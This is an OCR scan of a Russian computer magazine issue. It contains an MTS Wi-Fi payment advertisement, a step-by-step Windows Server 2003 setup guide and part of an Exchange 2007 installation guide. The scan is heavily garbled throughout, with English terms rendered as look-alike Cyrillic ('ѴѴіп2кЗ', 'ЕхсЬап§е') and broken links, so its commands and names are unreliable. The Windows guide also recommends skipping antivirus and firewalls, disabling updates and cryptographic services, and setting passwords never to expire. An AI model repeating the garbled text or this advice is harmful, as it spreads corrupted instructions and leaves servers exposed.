будет гарантировано хорошая скорость и стабильная работа. За такие услуги, как правило, надо платить, но как? Разве жудобно в самый неподходящий момент, когда уже 
вот-вот нужен инет, начинать беготню по зданию аэропорта в поискахтой самой, единственной и естественно неприметной палатки, где можно приобрести карты оплаты? 

А какого это читать издевательские надписи «Вы можете моментально оплатить связь посредством кредитной карты», но при этом этой самой кредитки при себе не иметь? 
Хватит! С появлением новой услуги от МТС, получить доступ к Интернету через ѴѴіРі будет проще простого - нужно всего лишь отправить 5М5-сообщение со своего телефона. 



І».І4.ІІЦИ!І!Ш!ШІ.14,І в аэропорте, ресторане, гостинице, кафе или любом другом месте, везде, где ты найдешь хот-споты ѴѴіРі, брендированные логотипом МТС, ты 
можешь оплатить доступ к Сети, просто отправив 5М5 на короткий номер. Деньги за использование Интернета будут списаны прямо ствоего мобильного счета, а логин и 
пароль для доступа придут тебе в 5М5-сообщении. Важно, что ты ничего не теряешь, даже если не израсходуешь оплаченный лимит. Любой остаток приобретенного вре- 
мени или трафика сохраняется за абонентом, поэтому ты сможешь использовать его позднее в любом месте, где присутствует та же самая сетьхотспотов. Словом, лучше и 
не придумать: это реальная возможность подключиться к быстрому Интернету на скорости до 54 Мбит/с, т.е. серфить инетточно также, как и дома в своей локальной сети. С 
таким коннектом тебе под силу многое! 
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ѴѴШ2КЗ: АРМИРОВАННАЯ 
УСТАНОВКА НА СТЕРОИДАХ 



Поднимаем капитальный сервер на базе ѴѴіпбоѵѵз Зегѵег 2003 
за 7 шагов 



Виндрвыи 

ОБМЕННИК 



Ехсйап§е: надежная система обмена сообщениями на базе ѴѴіпсІоѵѵз 

Реставрируем 
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Восстановление ѴѴіпбоѵѵз Вегѵег 2003 после тяжелых ранений 



Возьми ИНДЕЙЦА 
ПОД ЗАЩИТУ 

Обеспечиваем безопасность инфраструктуры веб-сервера 



2 ВИДЕОУРОКА 
ДЛЯ АДМИНОВ 
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\Ѵш2КЗ: АРМИРОВАН- 
НАЯ УСТАНОВКА 
НА СТЕРОИДАХ 

ПОДНИМАЕМ КАПИТАЛЬНЫЙ СЕРВЕР НА БАЗЕ ѴѴШ00ѴѴ5 5ЕРѴЕВ 2003 ЗА 7 ШАГОВ 



ѴѴіпс1о\ѵ5 Зегѵег 2003 — абсолютный лидер на рынке ЗОНО-серверов, используемых в качестве файлово- 
го сервера и/или сервера печати. Конкуренция со стороны Ілпих- и ВЗБ-систем в этом сегменте крайне 
слаба, поскольку мелкие организации просто не в состоянии (со)держать квалифицированного админи- 
стратора, а кажущаяся легкость установки ѴѴіп2кЗ создает впечатление, что с ним справится даже сек- 
ретарша. Отчасти это действительно так, но воздвигнуть быстрый, надежный и защищенный сервер не 
так-то просто! В попытке уберечь начинающих администраторов от типичных ошибок и было написано 
это пошаговое руководство. 



роблемам установки и эксплуатации ѴѴіп2кЗ посвящены 
сотни книг и тысячи статей, причем каждый автор гнет 
свою линию, зачастую противоречащую всем остальным. В 
одной статье советуется одно, в другой — другое. Дейст- 
вительно, универсальных решений нет, и поставленную задачу можно 
решить множеством способов. 

Мыщъх исповедует принцип минимализма, заключающийся в 
отказе от всех дополнительных функций. Если мы можем обойтись без 



ЭНСР-сервера, прописав ІР-адреса руками, значит именно таки нужно 
поступить. Если мы можем обойтись без домена и службы АсГіѵе БігесНогу, 
просто забудем о них! Конечно, кому-то такая концепция может показаться 
изначально порочной (а как же технический прогресс?), но, как показыва- 
ет практика, чем сложнее система, тем больше шансов у нее развалиться. 
Советы по установке, настройке и эксплуатации ѴѴіп2кЗ разбиты на 
7 шагов и покрывают практически все вопросы, с которыми сталки- 
ваются начинающие администраторы. Приступим. 
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ШАГ ПЕРВЫЙ: ВЫБИРАЕМ ЖЕЛЕЗО 

Собрать сервер можно и на базе обычного РС. Ничего зазорного в 
этом нет. И работать он будет ничуть не хуже, чем железо от ведущих 
производителей, собирающих его из тех же самых комплектующих, 
что продаются на рынке. Но здесь стоит привести несколько важных 
рекомендаций. 

От использования активных охлаждающих элементов на чипсете и ви- 
деокарте желательно отказаться. Блок питания следует брать с большим 
запасом по мощности так, чтобы он сохранял свою работоспособность 
даже после выхода вентилятора из строя. Ничего не поделаешь — сервер 
такая вещь, в которую заглядывают не часто. 

Что касается жестких дисков, то свой выбор лучше остановить на 
8еа§а(е. Они шустры и надежны, а в случае аппаратного отказа легко 
восстановимы. Интерфейс, естественно, ГОЕ/5АТА, а ЗСЗІ оставим тем, 
кому действительно нужна высокая производительность и обработка 
большого количества запросов на ввод/вывод. Использовать ЗСЗІ-дис- 
ки в ЗОНО-серверах — все равно что летать за сигаретами на вертолете. 
То же самое относится и к КАГО-массивам. Как показывает мой личный 
опыт, отказы жестких дисков — далеко не самая частая причина разру- 
шения данных. К тому же за использование дешевых интегрированных 
КАГО-контроллеров администраторов нужно расстреливать на месте, 
поскольку, если материнская плата выйдет из строя, а другой такой не 
окажется, диски придется сдавать на восстановление спецам. Гораздо 
надежнее настроить М5 Васкир на ежедневное резервирование всех 
данных на второй винчестер, подключенный к обычному ЮЕ-контрол- 
леру (смотри шаг седьмой) . 

Монитор. Зачем он нужен серверу? Правильно, абсолютно не нужен 
(в повседневной работе) . А для установки и наладки можно на время 
позаимствовать монитор от ближайшей рабочей станции. Большинство 
современных ЬСО-мониторов имеют два входа: цифровой и аналоговый. 
Отсюда идея: подключаем рабочую станцию к цифровому входу, сервер 

— к аналоговому и переключаемся между ними по необходимости. Как 
вариант — можно использовать КѴМ-переключатель. 

Все существующие в настоящее время блоки бесперебойного питания 

— это тихий ужас. Мыщъх перепробовал много моделей, пока не остано- 
вился на АРС ЗтагИ 1000ѴА и 2200ѴА как на наименее проблемных. 

ШАГ ВТОРОЙ: ИНТЕГРАЦИЯ ПАКЕТОВ ОБНОВЛЕНИЙ 

Берем диск с ѴѴіп2кЗ, садимся за ближайшую рабочую станцию, скачиваем 
все заплатки и пакеты обновлений, после чего интегрируем их в дистрибу- 
тив, следуя инструкциям, размещенным в файле ѵѵіпііеірііпе.іпіо. А почему 



бы нам не скачать заплатки после установки сервера через ѴѴіпбо\ѵз 
Прсіане? Ведь большинство начинающих администраторов именно так и 
поступают (и только потом соображают, что они сотворили и как теперь 
это расхлебывать) . 

Выходить в Сеть на незалатанном сервере крайне опасно, поскольку там 
шастает куча червей, ломящихся во все дыры. Мыщъх неоднократно 
фиксировал попытки атак, совершаемых уже через несколько минут после 
выхода в интернет. Естественно, за такое короткое время скачать обновле- 
ния невозможно, и сервер изначально оказывается прокаженным. 
Желательно вообще лишить ЗОНО-сервер доступа в Сеть, используя в 
качестве шлюза БЗЬ-модем со встроенным брандмауэром, оснащенный 
ЕнЬегпеГ-портом. Соединяем модем со свитчем, закрываем доступ к 
серверу на брандмауэре и отправляем хакеров отдыхать, а все обновления 
качаем с рабочих станций, причем вместо дырявого ІЕ лучше использовать 
Горящего Лиса или Оперу. 

ШАГ ТРЕТИЙ: АВТОМАТИЧЕСКИЙ ЗАПУСК СЕРВЕРА 

В мелких организациях за серверами обычно никто не следит. Вводить 
ставку дежурного оператора — слишком дорогое удовольствие, а прихо- 
дящий администратор зачастую находится вне досягаемости. А теперь 
вопрос: что произойдет, если, например, отрубят питание и ІІРЗ отпра- 
вит сервер в шатдаун? Или система выбросит голубой экран? Или кто-то 
случайно выдернет силовой кабель, либо прижмется мягким местом к 
кнопке КезеИ? Правильно, после включения система потребует нажать 
<Сіг1-АІЫЭе1>, а затем появится диалоговое окно ЕѵепГ Тгаскег’а, тре- 
бующего объяснить, почему сервер не был потушен должным образом. 
После описания проблемы система перейдет к процессу авторизации, 
ожидая пароля администратора. 

Учитывая, что у большинства пользователей физический доступ к 
серверу отсутствует, им придется очень несладко, не говоря уже о самом 
администраторе, вынужденном из-за каждой мелочи мотаться по всему 
городу. Чтобы не трепать себе нервы, лучше пренебречь безопасностью 
и настроить сервер так, чтобы при подаче питания он стартовал автома- 
тически, не требуя нажатия кнопки Ро\ѵег. Такое поведение настраива- 
ется через ВІ05 ЗеШр (кстати говоря, не все модели материнских плат 
позволяют это сделать) . 

Теперь перейдем к отключению запроса на нажатие < СигІ-АІИ-ПеІ > . 
Заходим в Асітітзігагіѵе ТооІ5\Ьоса1 Зесигііу Роіісе, в дереве Зесигііу 
ЗеШп§5 раскрываем ветвь Ьосаі РоІісезХЗесигПу Оргіопз и в пра- 
вой половине окна находим пункт «ІпНегасгіѵе 1о§оп: Бо поі ^е^иі^е 
СТКЕ+АІТ-І-ОЕЕ», по умолчанию находящийся в состоянии БізаЫесІ. 
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Блокировка срока истечения пароля 



Дважды щелкаем по нему мышью и меняем ОізаЫесІ на ЕпаЫесі. 
Остается только прищемить Еѵепі: Тгаскег, чтобы сидел себе тихо и 
не возникал. В командной строке вводим тшс для запуска Місгозой 
Мапа^етепі: Сопзоіе, затем в меню Рііе выбираем пункт «Абсі/Кетоѵе 
Зпар-іп. . .» (или нажимаем < Сигі-М > ) , далее в появившемся диалоговом 
окне находим кнопку АсЫ и добавляем Сгоир Роіісу СЛуесі ЕсііНог. Закры- 
ваем ненужные диалоговые окна кнопками Ріпізіі и Сіозе, переходим 
ко вкладке ЕхИепзіопз и выбираем Асітіпізітайѵе Тетріаіез (СотрШег 
Сопй^игайоп), жмем ОКи в Сопзоіе гооіЛЬосаІ СотриНег Ро1ісу\ 
Абтіпіз^гайѵе Тетр1аі:е5\5у5І:ет находим пункт Бізріау ЗЬиНсіоѵѵп Еѵепі: 
Тгаскег, который двойным мышиным щелчком переводим в состояние 
БізаЫесІ. Все. Теперь с этими надоедливыми вопрошалками покончено 
раз и навсегда. 

И хотя запрос на ввод пароля администратора по-прежнему будет 
маячить при старте системы, разделяемые файлы, папки и принтеры 
уже будут нормально работать, так что вводить пароль необязатель- 
но. Автоматическая регистрация в системе негативно сказывается на 
безопасности, поскольку любой пользователь, имеющий физический 
доступ к серверу, сможет сделать с ним такое, что администратор будет 
разгребать не одну неделю. 

ШАГ ЧЕТВЕРТЫЙ: НАСТРОЙКА ПОЛЬЗОВАТЕЛЬСКИХ 
АККАУНТОВ 

По умолчанию ко всем разделяемым ресурсам (файлам, папкам, 
принтерам) имеют доступ только пользователи, зарегистрированные 
на сервере. Если имя и пароль удаленного пользователя совпадают с 
именем/паролем пользователя, зарегистрированного на сервере, то 
запрос на ввод пароля не выдается, что очень удобно. Пользователи 
вообще не любят вводить пароли, поэтому, чтобы облегчить их участь, 
мыщъх рекомендует поступать так: рабочие станции на базе ѴѴіп2к/ХР 
настраиваются на автоматический вход в систему, а на сервере созда- 
ются «зеркальные» учетные записи всех пользователей, что обеспечи- 
вает «прозрачную» работу с разделяемыми ресурсами. Зачастую поль- 
зователи вообще не догадываются о том, что они защищены какими-то 
там паролями. Между тем администратор может свободно назначать 
права доступа на разделяемые ресурсы. Для одних пользователей они 
открыты на запись/чтение, другие поставлены в геаб опіу, а третьи не 
видят их вообще. 

Однако на этом пути есть несколько подводных камней. Так, если пользо- 
ватель решит сменить свой пароль, то зайти на сервер он уже не сможет. 
Вернее, сможет, но при попытке доступа к разделяемому ресурсу система 
потребует ввести старый пароль (ведь на сервере он остался неизмен- 
ным), что окажется для пользователя большой неожиданностью. Следова- 



тельно, в дополнение к автоматической регистрации на рабочих станциях, 
необходимо также запретить смену паролей пользователям и установить 
срок действия пароля в пеѵег ехрігез. То же самое следует сделать и на 
сервере. Для этого заходим в Асітіпізіігагіѵе ТооІзХСотріПег Мапа^етепі:, 
находим пункт Ьосаі ІІзегз апб Сгоирз, переходим к юзерам и в свойствах 
каждого из них взводим галочку Раззѵѵогсі пеѵег ехрігез. 

ШАГ ПЯТЫЙ: ОТКЛЮЧЕНИЕ НЕНУЖНЫХ СЛУЖБ 

По умолчанию МісгозоЛ задействует множество служб, большая 
часть которых совершенно бесполезная, а местами даже откровенно 
вредная. Поэтому, чтобы обеспечить бесперебойную работу сервера 
(особенно в условиях скромных аппаратных ресурсов), мы должны 
зайти в Асітіпізігагіѵе Тоо1з\5егѵісез и навести здесь свой порядок. 
Естественно, порядок — весьма условное понятие, относительность 
которого мы уже обсуждали. Кому-то нравится максимализм, кому- 
то — минимализм. В общем, каждый может действовать по своему 
усмотрению. 

• АіПотаНіс ПрсіаТез («Автоматические обновления») отключаем 
сразу и навсегда, потому что сервер не должен проявлять излишнюю 
самостоятельность. К тому же, как уже говорилось выше, лучше всего 
отрубить сервер от Сети, а обновления скачивать вручную с рабочих 
станций, тут же пересобирая интегрированный дистрибутив, чтобы в 
любой момент времени систему можно было переустановить поверх 
старой. 

• Сотриіег Вгоѵѵзег («Обозреватель компьютеров») также можно 
отключить, поскольку рабочие станции сами ломятся на сервер и ничего 
обозревать тут не нужно — это только занимает время, отъедает память и 
приводит к различным конфликтам. 

• СгурЮ^гарЫс Зегѵісез («Крипографические сервисы») абсолютно не 
нужны. Отключаем эту службу без всяких колебаний. 

• ПСНР СНепИ («Клиент ОСНР») отправляется в топку, потому что ПСНР- 
сервер в небольшой локальной сети — все равно что трактор на дачном 
участке. Нормальные администраторы прописывают ІР-адреса вручную. 

• ШзізіЪгйесІ ІлпкТгаскіп§ СІіепГ («Клиент слежения за распределенными 
ссылками») отслеживает перемещение файлов как внутри одного ШТ5- 
тома, таки между томами. Довольно громоздкая, уродливо реализованная 
и совершенно бесполезная вещь, поскольку реальные программы опи- 
раются на абсолютные пути, и если файл перемещен, то никакой клиент 
слежения тут не поможет. Короче, выключаем эту штуку. 

• ОізИгіЪіПесІ Тгапзасгіоп СоогсНпаШг («Координатор распределенных 
транзакций») — крутая служба, вот только. . . это уже не трактор, а самый 
настоящий реактивный истребитель на дачном участке, причем без воз- 
можности вертикального взлета и посадки. Ну и зачем он нам там нужен? ! 
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Внешне ѴѴіп2кЗ очень похож на ХР 



• БИЗ СНепИ («ЭИЗ -клиент») — Місгозой пугает нас, что если отключить 
эту службу, то компьютер не сможет распознавать доменные имена. 
Чепуха! Практически все сетевые приложения занимаются распознанием 
доменных имен самостоятельно, и мне не известна ни одна программа, 
которая бы напрямую взаимодействовала с ОИЗ-клиентом. А вот служба 
Асгіѵе ЭігесШгу без него работать не будет, это точно. 

• Еггог Кероггіп§ Зегѵісе («Сервис составления отчетов об ошибках») стоит 
прищемить на корню как злостного стукача, собирающего информацию 
об ошибках и отправляющего ее в МісгозоЛ. 

• Неір аші ЗирроП («Помощь и поддержка») — еще одна абсолютно ненуж- 
ная служба, отключение которой никому не повредит. 

• ІРЗЕС Зегѵісез («Сервисы ІР5ЕС») идут в мусорку, потому что им совер- 
шенно нечего делать в рамках локальной сети, когда злоумышленнику 
проще сесть за компьютер, чем врезаться в кабель. 

• Ьо^ісаЮізкМапа^ег («Менеджер логических дисков») реально нужен 
только тем, кто, следуя заветам Місгозой:, обновил обычные диски до 
динамических и обзавелся проблемами по полной. Всем остальным эта 
служба до лампочки . 

• НеШогкЬосагіоп Аѵѵагепезз (ЫЬА) — еще один бесполезный стукач, сле- 
дящий за состоянием сети и посылающий уведомления службам ѴѴіпбоѵѵз 
Еігеѵѵаіі и ІШегпеі: Соппесгіоп 5Ііагіп§, которые на файловом сервере также 
стоит отключить. 

• Кетозе Ке§І5І:гу («Удаленный доступ к реестру») — зачем нам удаленный 
доступ к реестру? Выключаем немедленно. А реестром будем рулить через 
физический доступ или утилиты типа КАбтіп. 

• ѴѴігеІезз Сопй^игагіоп («Беспроводная конфигурация») — отключаем, 
если локальная сеть построена на витой паре, а не на новомодных ѴѴі-Рі 
адаптерах. 

Примечание: отключение некоторых служб может привести к тому, 
что сервер вообще откажется загружаться. Не паникуй! Просто зайди в 
Кесоѵегу Сопзоіе («Консоль восстановления») и воспользуйся командой 
епаЫе, принимающей два аргумента: имя запускаемой службы и тип 
запуска, например: епаЫе еѵеШІод 5егѵісе_аіПо_5і:агі:. 

Если ты не уверен в своих действиях, то вместо отключения (сіізаЫесі) 
службы выбирай ручной тип запуска (тапиаі) , который на самом деле не 
совсем ручной, а просто подразумевает возможность запуска службы из 
других служб, которые в ней нуждаются и которые без нее могут работать 
неправильно или не работать совсем. Если после перевода службы в 
тапиаі при следующей загрузке сервера она все-таки стартовала (статус 
ЗнаПесІ), значит имеются неустраненные зависимости и переводить ее в 
бізаЫесІ следует с очень большой осторожностью. 

Также можно попробовать остановить службу прямо на рабочем сервере и 
посмотреть, что из этого получится. Кстати говоря, в отличие от предыду- 



«Антивирусы, автоматически про- 
веряющие все открываемые фай- 
лы на лету, брандмауэры и прочие 
защитные механизмы на сервере 
лучше всего не устанавливать» 



щих версий, ѴѴіп2кЗ препятствует отключению жизненно важных служб 
(например, службы удаленного вызова процедур — КРС, на которой дер- 
жится вся подсистема \ѵіп32), так что можно смело экспериментировать. 

ШАГ ШЕСТОЙ: ОТКАЗ ОТ АНТИВИРУСОВ 

Антивирусы, автоматически проверяющие все открываемые файлы на 
лету, брандмауэры и прочие защитные механизмы на сервере лучше всего 
не устанавливать. Поверь моему печальному опыту. Сам по себе ѴѴіп2кЗ 
— довольно надежная штука, и на исправном железе она работает без 
перезагрузок годами, а вот защитные системы внедряются в ядро настоль- 
ко неумело, что голубые экраны появляются с завидной регулярностью, 
особенно на двуядерных процессорах и ЗМР-системах. 

Можно, конечно, отключить все проактивные компоненты, оставив один 
лишь антивирусный сканер, вызываемый по расписанию (некоторые 
администраторы именно так и поступают), но все дело в том, что сканер 
(даже запущенный с минимальным приоритетом) серьезно тормозит ра- 
боту сервера, вызывая недовольство пользователей. Теоретически можно 
спланировать расписание так, чтобы сканер запускался только в ночное 
время или по выходным, но иногда фирмам приходится работать в авраль- 
ном режиме и ночью (не говоря уже о выходных), и сервер тут тормозить 
будет совсем некстати. 

Антивирусов, установленных на рабочих станциях, вполне достаточно для 
обеспечения надлежащего уровня безопасности, тем более когда файлово- 
му серверу закрыт доступ в интернет. 

ШАГ СЕДЬМОЙ: СОЗДАНИЕ РЕЗЕРВНЫХ КОПИЙ 

Сразу же после установки ѴѴіп2кЗ настоятельно рекомендуется создать 
резервную копию системы с помощью утилиты М3 Васкир (смотри статью 
«Реставрируем окна»), позволяющей восстановить упавший сервер за 
несколько минут без необходимости его переустановки. 

Также полезно подключить к серверу еще один жесткий диск, установить 
на него ѴѴіп2кЗ (или сделать копию системного диска с помощью ІЧоіТоп 
Сііозі:) и. . . физически отключить его до лучших времен. Тогда при крахе 
системы мы сможем немедленно переключиться на резервный диск, 
просто переткнув шлейфы. 

ЗАКЛЮЧЕНИЕ 

Разумеется, тонкости установки и работы с ѴѴіп2кЗ этим не исчерпывают- 
ся, и впереди нас ждет много «интересных» дней, нештатных ситуаций и 
головоломных проблем. Но безвыходных ситуаций не бывает, так что не 
стоит опускать свой хвост и пасовать перед сложностями. Это даже хоро- 
шо, что жизнь такая сложная. Иначе бы нам, администраторам, пришлось 
бы разделить участь мамонтов. И-Е 
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Виндовый ОБМЕННИК 



ЕХСНАЫ6Е: НАДЕЖНАЯ СИСТЕМА ОБМЕНА СООБЩЕНИЯМИ НА БАЗЕ ѴѴШБ0ѴѴ5 

На раннем этапе развития интернета возможности систем обмена информацией были ограничены, 
а пользователи крайне неприхотливы. Но времена изменились, и сегодня администратору требуется 
обеспечить простую и безопасную работу с различными видами сообщений (электронными письмами, 
голосовыми месседжами, факсами) независимо от местонахождения клиента. Стандартом де-факто пост- 
роения единой системы обмена сообщениями является Ехсйапде. В этой статье мы разберем особенности 
последней версии сервера ЕхсЬапде 2007. 



ПОДГОТОВИТЕЛЬНЫЕ МЕРОПРИЯТИЯ 

За последние десять лет было выпущено несколько версий Ехсйап§е Зегѵег 
(4.0, 5.0, 5.5, 2000 и 2003), каждая из которых получила обновленные 
функции. Выход ЕхсЬап^е 2007 (ранее известного как Ехсйап§е 12) тоже не 
стал исключением. При его разработке, которая началась еще до появле- 
ния версии 2003, были проанализированы и учтены тенденции последних 
лет и пожелания пользователей и администраторов. 



Установка ЕхсЬап§е никогда не была сложной задачей, если заранее про- 
анализирована сеть и выполнены все условия. Для проверки готовности 
следует использовать инструмент Ехсйап§е Зегѵег ВезГ Ргасгісез Апаіугег 
— ЕхВРА ( ЩсЬпеЕтісгозоіТ.сот/еп-из /ехсЬап^е/ЬЬ288481. азрх) , хотя он 
больше полезен при обновлении и поел едующей доводке системы, чем 
при первичной установке. Далее следует убедиться, что используе- 
мая среда отвечает всем требованиям. Одни требования касаются 
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аппаратной и программной части, другие — настроек Асгіѵе ІЭігесЮгу и 
сервисов, участвующих в работе Ехсйап§е. 

При установке ЕхсЬап^е 2007 будут созданы универсальные группы безо- 
пасности, которые могут существовать только в доменах, находящихся в 
основном режиме ѴѴіпбоѵѵз 2000 Зегѵег или в более совершенном режиме. 
Если контроллер домена находится в смешанном режиме, установка будет 
прервана. Чтобы изменить функциональный уровень домена, открываем 
оснастку «Асгіѵе ОігесНогу — домены и доверие», находим в дереве консоли 
свой домен и в контекстном меню пункт «Повысить функциональный уро- 
вень домена». Выбираем «Основной режим ѴѴіпсІоѵѵз 2000» или «ѴѴіпбочлге 
Зегѵег 2003» и нажимаем кнопку «Повысить». Для всех доменов в лесу 
Асгіѵе ОігесШгу, где будет установлен Ехсгіап^е 2007, между лесами должны 
быть установлены доверительные отношения. 

Контроллер домена, являющийся хозяином схемы (ЗсЬета тазіег) и 
глобальным каталогом (СІоЬаІ СаИа1о§), должен работать под управлени- 
ем ѴѴіпсІо\ѵ5 Зегѵег 2003 с установленным пакетом обновлений ЗР1 или 
ЗР2. Естественно, необходимауже работающая БИЗ-инфраструктура. 

Но, в отличие от предыдущих версий, администратору не нужно вручную 
подготавливать Асгіѵе ВігесШіу, все необходимое сделает мастер во время 
установки. И даже если какие-либо требования не будут выполнены, 
мастер выдаст все надлежащие рекомендации по исправлению ситуации. 
Запустив на ЗсЬета Мазіег файл зеШр.ехе с ключом /РгерагеАЕ), можно 
подготовить домен вручную, но если организация уже использует ранние 
версии ЕхсЬап§е, следует использовать ключи /РгерагеЬе§асуЕхс1іап§еРе 
гтІ55Іоп5 и /РгерагеЗсЬета. Стоит также отметить, что не все роли, в кото- 
рых может выступать ЕхсЬап§е, требуют обязательного наличия АЕ). 

В конце 2005 года было объявлено, что для увеличения масштабируемости 
и производительности ЕхсЬап§е 2007 будет работать только на 64-разряд- 
ных процессорах. Ведь при использовании 64-разрядной адресации сервер 
можно оснастить большим объемом оперативной памяти, которая может 
быть использована, например, для кэширования страниц базы данных, да 
и о других параметрах, вроде максимального размера файла, заботиться 
уже не нужно. Такой шаг вызвал множество споров, и, хотя сегодня в спи- 
ске присутствуют 32-битные системы, важно учесть, что 32-разрядная вер- 
сия ЕхсЬап^е 2007 предоставляется только для тестирования и обучения, 
для производственных сред она не предназначена. Для работы следует 
устанавливать и использовать только 64-разрядную версию. 

Итак, для установки нам потребуется компьютер с процессором класса 
х64, поддерживающим ІШеІ ЕМ64Т или А1ѴШ64 (но не процессорцы 
ІНапіит) . Рекомендуемым объемом ОЗУ является 2 Гб плюс 5 Мб на каж- 
дый почтовый ящик. Раздел, в который устанавливается ЕхсЬап§е, должен 
быть отформатирован под файловую систему ИТЕЗ и иметь не менее 1,2 Гб 



свободного места. В отличие от предыдущих версий, ЕхсЬап^е 2007 имеет 
встроенные службы ЗМТР (Зішріе Маіі Тгапзіег РгоШсоІ), а для передачи 
сообщений между серверами внутри организации используется МАРІ, 
поэтому службы ЫИТР (ИеШогк Ыеѵѵз Тгапзіег РгоШсоІ) и ЗМТР не должны 
быть установлены. Для некоторых ролей понадобится включить или 
установить сетевой доступ к СОМ +, настроить службу ИЗ. Кроме этого, в 
системе должны быть установлены три обязательных продукта: Місгозогі 
.ИЕТ Егате\ѵогк2.0 (ео.тісго5о1цсот/гіѵ1іпк/?1іпкігі=63033) , ММС 3.0 
(5иррогЕтісго5огі.сот/?кЬісі = 907265) и ѴѴіпгіоѵѵз РоѵѵегЗкеІІ 1.0 (зиррогЕ. 
тісго5огі.сот/кЬ /926139) . Если мастер установки ЕхсЬап^е не обнаружит 
наличие этих компонентов, ссылки для их установки будут приведены в 
сводном экране. Установленные компоненты будут неактивны и подсвече- 
ны серым цветом. 

УСТАНОВКА ЕХСНАЫСЕ 2007 

Установочный файл размером почти 700 Мб можно скачать на сайте 
Місгозогі: после регистрации. Для установки понадобятся права админи- 
стратора домена. Распаковываем архив и запускаем находящийся внутри 
файл зеШр.ехе. Мастер установки, который запускается после выбора 
«Установить МісгозоК Ехс1іап§е», имеет интуитивный интерфейс, поэтому 
сам процесс достаточно понятен даже новичку. 

Установка Ехсгіап^е стоит четвертой по списку, первые три пункта 
должны быть выполнены (отмечены серым) . Далее принимаем условия 
лицензионного соглашения, решаем, следует ли отправлять отчеты об 
ошибках в Місгозогі:, и выбираем вариант установки. Доступны обычная 
и выборочная установки. Первый вариант под ходит для большинства 
случаев, будут установлены все роли, за исключением Есі§е Тгапзрогі:. Если 
нужно настроить работу Ехсііап^е в кластере, выбрать конкретные роли 
сервера или установить только консоль управления, следует использовать 
второй вариант. Хотя большинство параметров можно перестроить после 
установки. В следующем окне вводим имя организации Ехс1іап§е, при ус- 
тановке первого сервера организации этот параметр обязателен. В имени 
организации не должно быть специальных символов, а также начальных и 
конечных пробелов. 

На странице «Параметры клиента» указываем, используется ли на кли- 
ентских компьютерах Оигіоок 2003 или более ранний. Если выбран ответ 
«Да», на сервере почтовых ящиков будет создана база данных общих папок 
(РиЫіс РоЫегз) . При использовании Оигіоок 2007 общие папки не являют- 
ся обязательными, при необходимости этот параметр можно изменить в 
уже рабочей системе. 

Переходим к ответственному этапу «Проверка готовности», в ходе которо- 
го система и сервер будут проверены на готовность кустановке ЕхсЬап^е. 
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Здесь уже потребуется подключение к интернету. Всего будет проверено 
4 элемента. Если тест не пройден, можно пройти по ссылке «Рекомен- 
дуемое действие». После устранения ошибок следует нажать кнопку 
«Повторить попытку». Если все тесты на готовность пройдены, появится 
кнопка «Установка», нажатие которой, собственно, и запустит установ- 
ку Ехсйап§е. В зависимости от выбранных ролей этот процесс займет 
определенное время, по окончании жмем кнопку «Готово». 

Пятым шагом в меню установки является загрузка обновлений 
ЕхсЬап^е. После нее запускается консоль управления ЕхсЬап^е и можно 
приступать к настройке его работы. 

ПРОЦЕДУРЫ, ВЫПОЛНЯЕМЫЕ ПОСЛЕ УСТАНОВКИ 

Для управления ЕхсЬап§е 2007 администратор может задействовать 
несколько инструментов: консоль управления Ехсйап§е (ранее Ехсйап§е 
ЗузИет Мапа§ег), среду управления Ехсйапде (командная консоль 
Ехсйап§е, ранее Мопаб), оснастку «Асгіѵе ЭпесШгу — пользователи и 
компьютеры» и ЕхВРА. Консоль управления является основным инстру- 
ментом, хотя для автоматизации повторяющихся задач лучше использо- 
вать командную консоль. Все операции рассмотреть не получится, тем 
более что в зависимости от используемой схемы они могут отличаться, 
поэтому разберем наиболее типичные настройки, чтобы, быстро сори- 
ентировавшись, можно было сразу приступить к работе. 

После установки ЕхсЬап^е 2007 рекомендуется проверить правильность 
инсталляции. Это можно сделать, запустив командлет СеИ-Ехс1іап§е5егѵег 
в среде управления. Он должен показать список всех ролей сервера. Если 
во время установки возникли ошибки, источник проблемы можно вы- 
явить, заглянув в отчеты, которые находятся в каталоге ЕхсЬап§е5еШрЬо§5 
раздела, куда устанавливался ЕхсЬап§е. Просто ищем строки, содержащие 
слово «Ошибка». Как вариант — все подобные сообщения можно отобрать 
командой «СеИ-ЗеШрЬо^ с : \ехсйап§е5еШр1о§5\ехсЬап§е5еШр . 1о§ -еггог». 
Кроме этого, следует использовать и ЕхВРА, который можно вызвать как 
через меню «Пуск», так и выбрав пункт «Анализатор соответствия реко- 
мендациям» в консоли управления ЕхсЬап§е. После первого запуска консо- 
ли следует внимательно ознакомиться с заданиями во вкладке «Заверше- 
ние развертывания», они помогут в настройке различных параметров для 
установленных ролей сервера. 

Все роли сервера можно найти, открыв вкладку «Конфигурация органи- 
зации». Выбрав «Почтовые ящики», настраиваем параметры почтового 
ящика, которые будут применяться ко всей организации. Каждая вклад- 
ка представляет собой одну из функций почтового ящика. Так, в «Списке 
адресов» представлены получатели, сгруппированные по некоторым 
признакам. Выбрав в правой колонке ссылку «Создать список адресов». 



можно создать новые списки. В этой же роли настраиваются управляе- 
мые папки и политики, которые помогают их сгруппировать. Управляе- 
мые папки бывают двух видов: по умолчанию (например, «Входящие») и 
настраиваемые. Каждый вид настраивается в своей вкладке. По умолча- 
нию создается автономная адресная книга (ОАВ), в которую включены 
все клиенты. Такая книга позволяет клиентам электронной почты 
просматривать списки адресов без подключения к серверу ЕхсЬап^е. 
Выбрав «Создать параметры управляемого содержимого», можно задать 
настройки, которые будут контролировать обработку содержимого 
указанных управляемых папок, например срок хранения сообщений, 
их пересылку на другой адрес. Настройки ОАВ (обновление, поддержка 
клиентов, списки адресов) изменяются в одноименной вкладке. В пунк- 
те «Клиентский доступ» настраиваются политики почтовых ящиков 
ЕхсЬап§е АсгіѵеЗупс, определяющие, как пользователи смогут использо- 
вать мобильные устройства для подключения к серверу ЕхсЬап§е. 

После установки Ехсйап^е будет принимать и отправлять почту только 
для одного домена. Если организация использует несколько доме- 
нов, их необходимо авторизовать. Для этого следует настроить роль 
«Транспортный сервер-концентратор». Здесь несколько вкладок. Так, 
в «Обслуживаемыхдоменах» можно просмотреть список текущих до- 
менов и при необходимости, выбрав «Создать обслуживаемый домен», 
добавить остальные доверенные домены. После принятия почты с таких 
доменов ЕхсЬап§е может доставить ее получателю, передать на сервер 
электронной почты, расположенный в другом лесу, или отправить на 
пограничный сервер, который адресует ее по назначению. Во вкладке 
«Правила транспорта» задаем условия на соответствие, по которым 
будут проверяться все сообщения (отправитель, получатель, тема и про- 
чее) . В «Политиках адресов электронной почты» определяется формат 
по умолчанию для псевдонимов пользователей. В ЕхсЬап^е 2007 для 
подключения к удаленным системам электронной почты используются 
